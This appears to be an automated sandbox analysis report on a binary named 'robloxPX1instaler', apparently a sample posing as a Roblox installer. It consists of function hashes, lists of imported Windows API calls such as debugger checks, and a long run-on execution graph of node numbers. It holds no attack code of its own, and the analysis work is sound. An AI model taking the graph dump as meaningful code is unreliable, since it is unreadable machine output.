                                                                                                  Similarity
                                                                                                  • API ID: H_prolog3
                                                                                                  • String ID:
                                                                                                  • API String ID: 431132790-0
                                                                                                  • Opcode ID: 0da8359d014ae50235125a7176857f705708790306614ed90f353bbe6ed69e27
                                                                                                  • Instruction ID: dffffbba7a3ec08d93708e48dc610ba55f5cb44f138c51060e9b47c68bdd66de
                                                                                                  • Opcode Fuzzy Hash: 0da8359d014ae50235125a7176857f705708790306614ed90f353bbe6ed69e27
                                                                                                  • Instruction Fuzzy Hash: D5E09A76C4020EAADB00DFD4C496BEFBBFCAB08700F504466A205E7181EA7497458BA1
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00B0E470
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00B0E47A
                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00B0E487
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 3906539128-2721712938
                                                                                                  • Opcode ID: 1d93e8090e794692647d86de713ede4c5de58497acc40f9e88892411b4620add
                                                                                                  • Instruction ID: fb494a68f6727896180d42d6d31b0f6870e9e278839623d9db4f1be2ca63bb0b
                                                                                                  • Opcode Fuzzy Hash: 1d93e8090e794692647d86de713ede4c5de58497acc40f9e88892411b4620add
                                                                                                  • Instruction Fuzzy Hash: 0E31C5749012189BCB21DF29D889B8CBBF8FF08310F5041DAE41CA7291EB709F858F45
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                  • Instruction ID: 6daa73c9cfc40e05090d29e0950614a808e74ffa52c5573c4225f1b68df362a5
                                                                                                  • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                                                  • Instruction Fuzzy Hash: 67E08C3291123CEBCB24DB9CD90498AF3ECEB48F01B1100D6B505E3500C270DE00CBD0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                  • Instruction ID: 959c4cc6b613ffd297cbbcab40763acb67dfea66dc0b8f4d6938408daf161bfe
                                                                                                  • Opcode Fuzzy Hash: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                                                  • Instruction Fuzzy Hash: 8DC08C34001D2046CE29C910F2B13EA33D5E392782F802ADCC80B0BE42C71E9C83D601
                                                                                                  APIs
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B06387
                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00B0638F
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B06418
                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00B06443
                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00B06498
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                  • String ID: [8$csm
                                                                                                  • API String ID: 1170836740-638191527
                                                                                                  • Opcode ID: 39cffc5554aa14590873368cc0bb699e571d89e0f84d0ae2eed6e5202f9f5f72
                                                                                                  • Instruction ID: ad8ef36fb4e85b72f84b8e00c6ad99d14f157295bb2b075efb4f8128076cb8d5
                                                                                                  • Opcode Fuzzy Hash: 39cffc5554aa14590873368cc0bb699e571d89e0f84d0ae2eed6e5202f9f5f72
                                                                                                  • Instruction Fuzzy Hash: D1419330A002099BCF10DF68D885A9EBFE5EF45324F14C195F8159B3D6DB31E965CBA1
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,38E2E45B,?,?,00000000,00B4D7FB,000000FF,?,00B243A1,00000002,?,00B24375,00B1466F), ref: 00B24403
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B24415
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00B4D7FB,000000FF,?,00B243A1,00000002,?,00B24375,00B1466F), ref: 00B24437
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$[8$mscoree.dll
                                                                                                  • API String ID: 4061214504-1273806674
                                                                                                  • Opcode ID: 2235dde3f078a1bd68abad16e57ae17b79b245864614c8fe41f59e60bcc6c648
                                                                                                  • Instruction ID: f625b9573e7c52cffb83773c2147efc7422dcca299e60582d16865f0f0f41f57
                                                                                                  • Opcode Fuzzy Hash: 2235dde3f078a1bd68abad16e57ae17b79b245864614c8fe41f59e60bcc6c648
                                                                                                  • Instruction Fuzzy Hash: F5016275940669ABDB119B54DC05FAEBBB8FB08B16F104665F821B2690DF749900CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 0-2721712938
                                                                                                  • Opcode ID: ff30d8e230d31d5cdde3ba95ef402c966a6bf5622b0c19771e742586a4aa51de
                                                                                                  • Instruction ID: f3f278c6411082da125f4646c44886737dccafb0327e3e34b87812bfec59a8a7
                                                                                                  • Opcode Fuzzy Hash: ff30d8e230d31d5cdde3ba95ef402c966a6bf5622b0c19771e742586a4aa51de
                                                                                                  • Instruction Fuzzy Hash: 8DA1F372E002358FDF25AF68F8997ACB7E1EB16B10F1540A9E44D7B2A1D7398E40CB51
                                                                                                  APIs
                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B02FAB
                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00B03093
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1450311775.0000000000811000.00000020.00000001.01000000.00000006.sdmp, Offset: 00810000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_810000_robloxPX1instaler.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                  • String ID: [8
                                                                                                  • API String ID: 3761405300-2721712938
                                                                                                  • Opcode ID: 64d649c16ed6e8c6f25994a8446dd4fa7031026e2171dcf6af3124bc4473c21b
                                                                                                  • Instruction ID: 495fe3f95e2027d546a8fca6151223715c73acdfde9eef9bbb0c629ffc8d6002
                                                                                                  • Opcode Fuzzy Hash: 64d649c16ed6e8c6f25994a8446dd4fa7031026e2171dcf6af3124bc4473c21b
                                                                                                  • Instruction Fuzzy Hash: 9B21E0B9A182009ED326DF16E959B447BF4FB98344F14407EE505CB3A8D7B0A881DB64

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:11.9%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:14.7%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:26
GetDeviceCaps ReleaseDC 26663->28409 26665 7ff6c16df461 28410 7ff6c16d84cc 26665->28410 28414 7ff6c16d8df4 16 API calls _handle_error 26665->28414 26668 7ff6c16df479 IsDlgButtonChecked DeleteObject 26668->26661 26670 7ff6c16c6300 26669->26670 26676 7ff6c16c638d 26669->26676 26671 7ff6c16b13a4 33 API calls 26670->26671 26672 7ff6c16c631b GetCurrentDirectoryW 26671->26672 26673 7ff6c16c6341 26672->26673 26674 7ff6c16b20b0 33 API calls 26673->26674 26675 7ff6c16c634f 26674->26675 26675->26676 26677 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26675->26677 26676->26049 26678 7ff6c16c63a9 26677->26678 26680 7ff6c16b2527 26679->26680 26681 7ff6c16b252a SetDlgItemTextW 26679->26681 26680->26681 26682 7ff6c171e2e0 26681->26682 26683->26056 26685 7ff6c16b2513 26684->26685 26686 7ff6c16b2516 SetDlgItemTextW 26684->26686 26685->26686 26688 7ff6c16b12d0 26687->26688 26694 7ff6c16b139b 26687->26694 26689 7ff6c16b12de memcpy_s 26688->26689 26692 7ff6c16b1396 26688->26692 26695 7ff6c16b1338 26688->26695 26689->26093 28417 7ff6c16b1f80 33 API calls 3 library calls 26692->28417 28418 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26694->28418 26695->26689 26696 7ff6c16e21d0 33 API calls 26695->26696 26696->26689 26697->26120 26699 7ff6c16c32bc 51 API calls 26698->26699 26700 7ff6c16c32b1 26699->26700 26700->26133 26700->26157 26701->26133 26703 7ff6c16b13a4 33 API calls 26702->26703 26704 7ff6c16c6489 26703->26704 26705 7ff6c16c648c GetModuleFileNameW 26704->26705 26708 7ff6c16c64dc 26704->26708 26706 7ff6c16c64de 26705->26706 26707 7ff6c16c64a7 26705->26707 26706->26708 26707->26704 26709 7ff6c16b129c 33 API calls 26708->26709 26711 7ff6c16c6506 26709->26711 26710 7ff6c16c653e 26710->26199 26711->26710 26712 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26711->26712 26713 7ff6c16c6560 26712->26713 26714->26214 26716 7ff6c16b20f6 26715->26716 26718 7ff6c16b20cb memcpy_s 26715->26718 28419 7ff6c16b1474 33 API calls 3 library calls 26716->28419 
26718->26234 26719->26246 26720->26257 26721->26266 26722->26270 26723->26279 26725 7ff6c16e3620 26724->26725 26725->26282 26726->26196 26728 7ff6c16b1177 26727->26728 26729 7ff6c16b2034 33 API calls 26728->26729 26730 7ff6c16b1185 memcpy_s 26729->26730 26730->26211 26732 7ff6c16b2085 26731->26732 26734 7ff6c16b2059 memcpy_s 26731->26734 28420 7ff6c16b15b8 33 API calls 3 library calls 26732->28420 26734->26185 26736 7ff6c16e2329 26735->26736 26737 7ff6c16dc350 26736->26737 26738 7ff6c16e2550 IsProcessorFeaturePresent 26736->26738 26739 7ff6c16e2568 26738->26739 28421 7ff6c16e2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26739->28421 26741 7ff6c16e257b 28422 7ff6c16e2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26741->28422 28423 7ff6c16e783c 31 API calls 3 library calls 26744->28423 26746 7ff6c16e791d 28424 7ff6c16e7934 16 API calls abort 26746->28424 26749->26240 26750->26304 26751->26329 26752->26344 26753->26356 26779 7ff6c16c3e28 26754->26779 26758 7ff6c16ca589 26785 7ff6c16c9408 26758->26785 26761 7ff6c16ca6f2 GetSystemMetrics GetWindow 26763 7ff6c16ca821 26761->26763 26778 7ff6c16ca71d 26761->26778 26762 7ff6c16ca603 26764 7ff6c16ca6c2 26762->26764 26765 7ff6c16ca60c GetWindowLongPtrW 26762->26765 26767 7ff6c16e2320 _handle_error 8 API calls 26763->26767 26804 7ff6c16c95a8 26764->26804 26768 7ff6c171e2c0 26765->26768 26766 7ff6c16ca519 26766->26758 26776 7ff6c16ca56a SetDlgItemTextW 26766->26776 26800 7ff6c16c9800 26766->26800 26771 7ff6c16ca830 26767->26771 26772 7ff6c16ca6aa GetWindowRect 26768->26772 26771->26369 26772->26764 26774 7ff6c16ca73e GetWindowRect 26774->26778 26775 7ff6c16ca6e5 SetDlgItemTextW 26775->26761 26776->26766 26777 7ff6c16ca800 GetWindow 26777->26763 26777->26778 26778->26763 26778->26774 26778->26777 26780 7ff6c16c3e4d _snwprintf 26779->26780 26813 7ff6c16e9ef0 26780->26813 26783 7ff6c16d0f68 WideCharToMultiByte 26784 7ff6c16d0faa 26783->26784 26784->26766 26786 
7ff6c16c95a8 47 API calls 26785->26786 26789 7ff6c16c944f 26786->26789 26787 7ff6c16e2320 _handle_error 8 API calls 26788 7ff6c16c958e GetWindowRect GetClientRect 26787->26788 26788->26761 26788->26762 26790 7ff6c16b129c 33 API calls 26789->26790 26798 7ff6c16c955a 26789->26798 26791 7ff6c16c949c 26790->26791 26792 7ff6c16c95a1 26791->26792 26794 7ff6c16b129c 33 API calls 26791->26794 26793 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26792->26793 26795 7ff6c16c95a7 26793->26795 26796 7ff6c16c9514 26794->26796 26797 7ff6c16c959c 26796->26797 26796->26798 26799 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26797->26799 26798->26787 26799->26792 26801 7ff6c16c9840 26800->26801 26803 7ff6c16c9869 26800->26803 26852 7ff6c16ea270 31 API calls 2 library calls 26801->26852 26803->26766 26805 7ff6c16c3e28 swprintf 46 API calls 26804->26805 26806 7ff6c16c95eb 26805->26806 26807 7ff6c16d0f68 WideCharToMultiByte 26806->26807 26808 7ff6c16c9603 26807->26808 26809 7ff6c16c9800 31 API calls 26808->26809 26810 7ff6c16c961b 26809->26810 26811 7ff6c16e2320 _handle_error 8 API calls 26810->26811 26812 7ff6c16c962b 26811->26812 26812->26761 26812->26775 26814 7ff6c16e9f36 26813->26814 26816 7ff6c16e9f4e 26813->26816 26840 7ff6c16ed69c 15 API calls abort 26814->26840 26816->26814 26817 7ff6c16e9f58 26816->26817 26842 7ff6c16e7ef0 35 API calls 2 library calls 26817->26842 26818 7ff6c16e9f3b 26841 7ff6c16e78e4 31 API calls _invalid_parameter_noinfo 26818->26841 26821 7ff6c16e9f69 memcpy_s 26843 7ff6c16e7e70 15 API calls memcpy_s 26821->26843 26822 7ff6c16e2320 _handle_error 8 API calls 26823 7ff6c16c3e69 26822->26823 26823->26783 26825 7ff6c16e9fd4 26844 7ff6c16e82f8 46 API calls 3 library calls 26825->26844 26827 7ff6c16e9fdd 26828 7ff6c16ea014 26827->26828 26829 7ff6c16e9fe5 26827->26829 26831 7ff6c16ea06c 26828->26831 26832 7ff6c16ea092 26828->26832 26833 7ff6c16ea023 26828->26833 26835 7ff6c16ea01a 26828->26835 26845 7ff6c16ed90c 26829->26845 26836 
7ff6c16ed90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26831->26836 26832->26831 26837 7ff6c16ea09c 26832->26837 26834 7ff6c16ed90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26833->26834 26839 7ff6c16e9f46 26834->26839 26835->26831 26835->26833 26836->26839 26838 7ff6c16ed90c Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 26837->26838 26838->26839 26839->26822 26840->26818 26841->26839 26842->26821 26843->26825 26844->26827 26846 7ff6c16ed911 RtlRestoreThreadPreferredUILanguages 26845->26846 26847 7ff6c16ed941 Concurrency::details::SchedulerProxy::DeleteThis 26845->26847 26846->26847 26848 7ff6c16ed92c 26846->26848 26847->26839 26851 7ff6c16ed69c 15 API calls abort 26848->26851 26850 7ff6c16ed931 GetLastError 26850->26847 26851->26850 26852->26803 26865 7ff6c16b13a4 26853->26865 26856 7ff6c16b2494 26857 7ff6c16b129c 33 API calls 26856->26857 26858 7ff6c16b24a2 26857->26858 26859 7ff6c16b24dd 26858->26859 26862 7ff6c16b2505 26858->26862 26860 7ff6c16e2320 _handle_error 8 API calls 26859->26860 26861 7ff6c16b24f3 26860->26861 26861->26378 26863 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26862->26863 26864 7ff6c16b250a 26863->26864 26866 7ff6c16b13ad 26865->26866 26874 7ff6c16b142d GetWindowTextW 26865->26874 26867 7ff6c16b13ce 26866->26867 26868 7ff6c16b143d 26866->26868 26872 7ff6c16b13db memcpy_s 26867->26872 26875 7ff6c16e21d0 26867->26875 26885 7ff6c16b2018 33 API calls std::_Xinvalid_argument 26868->26885 26884 7ff6c16b197c 31 API calls _invalid_parameter_noinfo_noreturn 26872->26884 26874->26856 26877 7ff6c16e21db 26875->26877 26876 7ff6c16e21f4 26876->26872 26877->26876 26879 7ff6c16e21fa 26877->26879 26886 7ff6c16ebbc0 26877->26886 26880 7ff6c16e2205 26879->26880 26889 7ff6c16e2f7c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26879->26889 26890 7ff6c16b1f80 33 API calls 3 library calls 26880->26890 26883 7ff6c16e220b 26884->26874 26891 7ff6c16ebc00 
26886->26891 26889->26880 26890->26883 26896 7ff6c16ef398 EnterCriticalSection 26891->26896 26897->26395 26899->26403 26907 7ff6c16c9638 26900->26907 26903 7ff6c16c97d9 26905 7ff6c16e2320 _handle_error 8 API calls 26903->26905 26904 7ff6c16c9800 31 API calls 26904->26903 26906 7ff6c16c97f2 26905->26906 26906->26415 26906->26416 26908 7ff6c16c9692 26907->26908 26916 7ff6c16c9730 26907->26916 26909 7ff6c16d0f68 WideCharToMultiByte 26908->26909 26911 7ff6c16c96c0 26908->26911 26909->26911 26910 7ff6c16e2320 _handle_error 8 API calls 26912 7ff6c16c9764 26910->26912 26913 7ff6c16c96ef 26911->26913 26917 7ff6c16caa88 45 API calls _snwprintf 26911->26917 26912->26903 26912->26904 26918 7ff6c16ea270 31 API calls 2 library calls 26913->26918 26916->26910 26917->26913 26918->26916 26935 7ff6c16cd4d0 26919->26935 26923 7ff6c16cd8e5 _snwprintf 26924 7ff6c16e9ef0 swprintf 46 API calls 26923->26924 26932 7ff6c16cd974 26923->26932 26949 7ff6c16b9d78 33 API calls 26923->26949 26924->26923 26925 7ff6c16cd9a3 26927 7ff6c16cda17 26925->26927 26929 7ff6c16cda3f 26925->26929 26928 7ff6c16e2320 _handle_error 8 API calls 26927->26928 26930 7ff6c16cda2b 26928->26930 26931 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26929->26931 26930->26421 26933 7ff6c16cda44 26931->26933 26932->26925 26950 7ff6c16b9d78 33 API calls 26932->26950 26936 7ff6c16cd665 26935->26936 26938 7ff6c16cd502 26935->26938 26939 7ff6c16ccb80 26936->26939 26937 7ff6c16b1744 33 API calls 26937->26938 26938->26936 26938->26937 26941 7ff6c16ccbb6 26939->26941 26946 7ff6c16ccc80 26939->26946 26943 7ff6c16ccc20 26941->26943 26944 7ff6c16ccc7b 26941->26944 26947 7ff6c16ccbc6 26941->26947 26943->26947 26948 7ff6c16e21d0 33 API calls 26943->26948 26951 7ff6c16b1f80 33 API calls 3 library calls 26944->26951 26952 7ff6c16b2004 33 API calls std::_Xinvalid_argument 26946->26952 26947->26923 26948->26947 26949->26923 26950->26925 26951->26946 26954 7ff6c16dae80 GetDlgItem 26953->26954 26955 7ff6c16dae3c GetMessageW 
26953->26955 26954->26424 26954->26425 26956 7ff6c16dae5b IsDialogMessageW 26955->26956 26957 7ff6c16dae6a TranslateMessage DispatchMessageW 26955->26957 26956->26954 26956->26957 26957->26954 26960 7ff6c16c36b3 26958->26960 26959 7ff6c16c36e0 26978 7ff6c16c32bc 26959->26978 26960->26959 26961 7ff6c16c36cc CreateDirectoryW 26960->26961 26961->26959 26963 7ff6c16c377d 26961->26963 26965 7ff6c16c378d 26963->26965 27065 7ff6c16c3d34 26963->27065 26969 7ff6c16e2320 _handle_error 8 API calls 26965->26969 26966 7ff6c16c3791 GetLastError 26966->26965 26971 7ff6c16c37b9 26969->26971 26971->26442 26972 7ff6c16c3720 CreateDirectoryW 26973 7ff6c16c373b 26972->26973 26974 7ff6c16c3774 26973->26974 26975 7ff6c16c37ce 26973->26975 26974->26963 26974->26966 26976 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26975->26976 26977 7ff6c16c37d3 26976->26977 26979 7ff6c16c32e4 26978->26979 26980 7ff6c16c32e7 GetFileAttributesW 26978->26980 26979->26980 26981 7ff6c16c32f8 26980->26981 26982 7ff6c16c3375 26980->26982 26984 7ff6c16c6a0c 49 API calls 26981->26984 26983 7ff6c16e2320 _handle_error 8 API calls 26982->26983 26985 7ff6c16c3389 26983->26985 26986 7ff6c16c331f 26984->26986 26985->26966 26992 7ff6c16c6a0c 26985->26992 26987 7ff6c16c3323 GetFileAttributesW 26986->26987 26988 7ff6c16c333c 26986->26988 26987->26988 26988->26982 26989 7ff6c16c3399 26988->26989 26990 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 26989->26990 26991 7ff6c16c339e 26990->26991 26993 7ff6c16c6a4b 26992->26993 27012 7ff6c16c6a44 26992->27012 26995 7ff6c16b129c 33 API calls 26993->26995 26994 7ff6c16e2320 _handle_error 8 API calls 26996 7ff6c16c371c 26994->26996 26997 7ff6c16c6a76 26995->26997 26996->26972 26996->26973 26998 7ff6c16c6cc7 26997->26998 26999 7ff6c16c6a96 26997->26999 27000 7ff6c16c62dc 35 API calls 26998->27000 27001 7ff6c16c6ab0 26999->27001 27007 7ff6c16c6b49 26999->27007 27003 7ff6c16c6ce6 27000->27003 27029 7ff6c16c70ab 27001->27029 27079 7ff6c16bc098 33 API 
calls 2 library calls 27001->27079 27004 7ff6c16c6eef 27003->27004 27005 7ff6c16c6b44 27003->27005 27009 7ff6c16c6d1b 27003->27009 27048 7ff6c16c70cf 27004->27048 27096 7ff6c16bc098 33 API calls 2 library calls 27004->27096 27006 7ff6c16c70b1 27005->27006 27010 7ff6c16c70d5 27005->27010 27005->27012 27017 7ff6c16c70a6 27005->27017 27015 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27006->27015 27007->27005 27030 7ff6c16b129c 33 API calls 27007->27030 27039 7ff6c16c70bd 27009->27039 27082 7ff6c16bc098 33 API calls 2 library calls 27009->27082 27016 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27010->27016 27012->26994 27013 7ff6c16c6b03 27018 7ff6c16c6b15 memcpy_s 27013->27018 27024 7ff6c16b1fa0 31 API calls 27013->27024 27022 7ff6c16c70b7 27015->27022 27023 7ff6c16c70db 27016->27023 27028 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27017->27028 27027 7ff6c16b1fa0 31 API calls 27018->27027 27019 7ff6c16c6f56 27097 7ff6c16b11cc 33 API calls memcpy_s 27019->27097 27032 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27022->27032 27034 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27023->27034 27024->27018 27026 7ff6c16c70c3 27037 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27026->27037 27027->27005 27028->27029 27099 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27029->27099 27035 7ff6c16c6bbe 27030->27035 27031 7ff6c16c6f69 27098 7ff6c16c57ac 33 API calls memcpy_s 27031->27098 27032->27039 27033 7ff6c16b1fa0 31 API calls 27050 7ff6c16c6df5 27033->27050 27040 7ff6c16c70e1 27034->27040 27080 7ff6c16c5820 33 API calls 27035->27080 27042 7ff6c16c70c9 27037->27042 27038 7ff6c16c6d76 memcpy_s 27038->27026 27038->27033 27100 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27039->27100 27101 7ff6c16b704c 47 API calls memcpy_s 27042->27101 27043 7ff6c16c6bd3 27081 7ff6c16be164 33 API calls 2 library calls 27043->27081 27045 7ff6c16b1fa0 31 API calls 27049 7ff6c16c6fec 
27045->27049 27047 7ff6c16c6f79 memcpy_s 27047->27023 27047->27045 27102 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27048->27102 27051 7ff6c16b1fa0 31 API calls 27049->27051 27055 7ff6c16c6e21 27050->27055 27083 7ff6c16b1744 27050->27083 27054 7ff6c16c6ff6 27051->27054 27053 7ff6c16b1fa0 31 API calls 27058 7ff6c16c6c6d 27053->27058 27059 7ff6c16b1fa0 31 API calls 27054->27059 27055->27042 27056 7ff6c16b129c 33 API calls 27055->27056 27060 7ff6c16c6ec2 27056->27060 27057 7ff6c16c6be9 memcpy_s 27057->27022 27057->27053 27061 7ff6c16b1fa0 31 API calls 27058->27061 27059->27005 27062 7ff6c16b2034 33 API calls 27060->27062 27061->27005 27063 7ff6c16c6edf 27062->27063 27064 7ff6c16b1fa0 31 API calls 27063->27064 27064->27005 27066 7ff6c16c3d5e SetFileAttributesW 27065->27066 27067 7ff6c16c3d5b 27065->27067 27068 7ff6c16c3d74 27066->27068 27069 7ff6c16c3df5 27066->27069 27067->27066 27071 7ff6c16c6a0c 49 API calls 27068->27071 27070 7ff6c16e2320 _handle_error 8 API calls 27069->27070 27072 7ff6c16c3e0a 27070->27072 27073 7ff6c16c3d99 27071->27073 27072->26965 27074 7ff6c16c3d9d SetFileAttributesW 27073->27074 27075 7ff6c16c3dbc 27073->27075 27074->27075 27075->27069 27076 7ff6c16c3e1a 27075->27076 27077 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27076->27077 27078 7ff6c16c3e1f 27077->27078 27079->27013 27080->27043 27081->27057 27082->27038 27084 7ff6c16b18a1 27083->27084 27087 7ff6c16b1784 27083->27087 27103 7ff6c16b2004 33 API calls std::_Xinvalid_argument 27084->27103 27086 7ff6c16b18a7 27104 7ff6c16b1f80 33 API calls 3 library calls 27086->27104 27087->27086 27090 7ff6c16e21d0 33 API calls 27087->27090 27094 7ff6c16b17ac memcpy_s 27087->27094 27089 7ff6c16b18ad 27105 7ff6c16e354c 31 API calls __std_exception_copy 27089->27105 27090->27094 27092 7ff6c16b18d9 27092->27055 27093 7ff6c16b1859 memcpy_s 27093->27055 27094->27093 27095 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27094->27095 27095->27084 27096->27019 27097->27031 
27098->27047 27101->27048 27104->27089 27105->27092 27107 7ff6c16b7206 27106->27107 27108 7ff6c16b713b 27106->27108 27116 7ff6c16b704c 47 API calls memcpy_s 27107->27116 27114 7ff6c16b714b memcpy_s 27108->27114 27115 7ff6c16b3f48 33 API calls 2 library calls 27108->27115 27111 7ff6c16b720b 27112 7ff6c16b7273 27111->27112 27117 7ff6c16b889c 8 API calls memcpy_s 27111->27117 27112->26459 27114->26459 27115->27114 27116->27111 27117->27111 27119 7ff6c16c2102 27118->27119 27120 7ff6c16c20ea 27118->27120 27121 7ff6c16c2126 27119->27121 27124 7ff6c16bb544 99 API calls 27119->27124 27120->27119 27122 7ff6c16c20f6 FindCloseChangeNotification 27120->27122 27121->26483 27122->27119 27124->27121 27126 7ff6c16daa2f 27125->27126 27127 7ff6c16daa36 27125->27127 27126->26634 27127->27126 27128 7ff6c16b1744 33 API calls 27127->27128 27128->27127 27129->26634 27131 7ff6c16da47f 27130->27131 27152 7ff6c16da706 27130->27152 27264 7ff6c16dcdf8 33 API calls 27131->27264 27133 7ff6c16e2320 _handle_error 8 API calls 27135 7ff6c16da717 27133->27135 27134 7ff6c16da49e 27136 7ff6c16b129c 33 API calls 27134->27136 27135->26571 27137 7ff6c16da4de 27136->27137 27138 7ff6c16b129c 33 API calls 27137->27138 27139 7ff6c16da517 27138->27139 27140 7ff6c16b129c 33 API calls 27139->27140 27141 7ff6c16da54a 27140->27141 27265 7ff6c16da834 33 API calls _invalid_parameter_noinfo_noreturn 27141->27265 27143 7ff6c16da573 27145 7ff6c16da73a 27143->27145 27147 7ff6c16da740 27143->27147 27148 7ff6c16b20b0 33 API calls 27143->27148 27151 7ff6c16da685 27143->27151 27157 7ff6c16da734 27143->27157 27144 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27144->27145 27146 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27145->27146 27146->27147 27149 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27147->27149 27148->27151 27150 7ff6c16da746 27149->27150 27154 7ff6c16e7904 _invalid_parameter_noinfo_noreturn 31 API calls 27150->27154 27151->27150 27151->27152 27153 7ff6c16da72f 
